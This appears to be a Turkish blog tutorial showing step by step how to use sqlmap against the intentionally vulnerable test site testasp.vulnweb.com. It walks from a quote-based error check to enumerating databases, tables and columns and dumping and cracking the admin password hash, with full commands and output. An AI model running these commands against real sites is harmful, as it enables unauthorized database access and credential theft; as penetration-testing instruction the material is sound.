Sqlmap Kullanarak SQLi Hatalarından Veri Çekme
https://kaligunlugu.blogspot.com/2014/03/sqlmap-kullanarak-sqli-hatalarndan-veri.html
Hedef Sistem:testasp.vulnweb.com/showforum.asp?id=01.Adım:id=0 parametresine id=0' şeklinde bir tırnak göndererek sayfanın hata ile dönmesini bekliyoruz.
2.Adım:Sqlmap ile bu açıklıktan faydalanarak varolan veritabanlarını (-dbs) ve mevcut kullanıcıyı (-current-user) bulalım.
root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' --dbs --current-user..........
[15:41:08] [INFO] testing MySQL
[15:41:08] [WARNING] the back-end DBMS is not MySQL
[15:41:08] [INFO] testing Oracle
[15:41:08] [WARNING] the back-end DBMS is not Oracle
[15:41:08] [INFO] testing PostgreSQL
[15:41:09] [WARNING] the back-end DBMS is not PostgreSQL
[15:41:09] [INFO] testing Microsoft SQL Server
[15:41:09] [INFO] confirming Microsoft SQL Server
[15:41:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:41:10] [INFO] fetching current user
current user: 'acunetix'
[15:41:10] [INFO] fetching database names
[15:41:11] [INFO] the SQL query used returns 7 entries
[15:41:11] [INFO] retrieved: "acublog"
[15:41:11] [INFO] retrieved: "acuforum"
[15:41:12] [INFO] retrieved: "acuservice"
[15:41:12] [INFO] retrieved: "master"
[15:41:12] [INFO] retrieved: "model"
[15:41:13] [INFO] retrieved: "msdb"
[15:41:13] [INFO] retrieved: "tempdb"
available databases [7]:
[*] acublog
[*] acuforum
[*] acuservice
[*] master
[*] model
[*] msdb
[*] tempdb
[15:41:13] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 60 times
[15:41:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shutting down at 15:41:13
3.Adım:Acublog adındaki vertabanındaki tabloları bulalım.
root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog --tables..........
[15:45:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:45:16] [INFO] fetching tables for database: acublog
[15:45:25] [INFO] the SQL query used returns 3 entries
[15:45:26] [INFO] retrieved: "dbo.comments"
[15:45:27] [INFO] retrieved: "dbo.news"
[15:45:27] [INFO] retrieved: "dbo.users"
Database: acublog
[3 tables]
+--------------+
| dbo.comments |
| dbo.news |
| dbo.users |
+--------------+
[15:45:27] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 4 times
[15:45:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shutting down at 15:45:27
4.Adım:Dbo.users tablosundaki tüm sütun(kolon) isimlerini bulalım.
root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog -Tdbo.users --columns..........
[15:48:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:48:24] [INFO] fetching columns for table 'users' in database 'acublog'
[15:48:25] [INFO] the SQL query used returns 3 entries
[15:48:25] [INFO] retrieved: "alevel","int"
[15:48:26] [INFO] retrieved: "uname","nvarchar"
[15:48:26] [INFO] retrieved: "upass","nvarchar"
Database: acublog
Table: dbo.users
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| alevel | int |
| uname | nvarchar |
| upass | nvarchar |
+--------+----------+
[15:48:27] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 4 times
[15:48:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shutting down at 15:48:27
5.Adım:Dbo.users tablosundaki uname ve upass kolonlarındaki verileri çekelim.
root@bt:/pentest/database/sqlmap# python sqlmap.py -u 'testasp.vulnweb.com/showforum.asp?id=0' -D acublog -T dbo.users -C uname,upass --dump..........
[15:56:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:56:51] [INFO] cracked password 'none' for hash '334c4a4c42fdb79d7ebc3e73b517e6f8'
[15:56:51] [INFO] postprocessing table dump
Database: acublog
Table: dbo.users
[1 entry]
+-------+-----------------------------------------+
| uname | upass |
+-------+-----------------------------------------+
| admin | 334c4a4c42fdb79d7ebc3e73b517e6f8 (none) |
+-------+-----------------------------------------+
[15:56:51] [INFO] table 'acublog.dbo.users' dumped to CSV file '/pentest/database/sqlmap/output/testasp.vulnweb.com/dump/acublog/users.csv'
[15:56:51] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 7 times
[15:56:51] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shutting down at 15:56:51
Bu kadar umarım anlatabilmişimdir :D
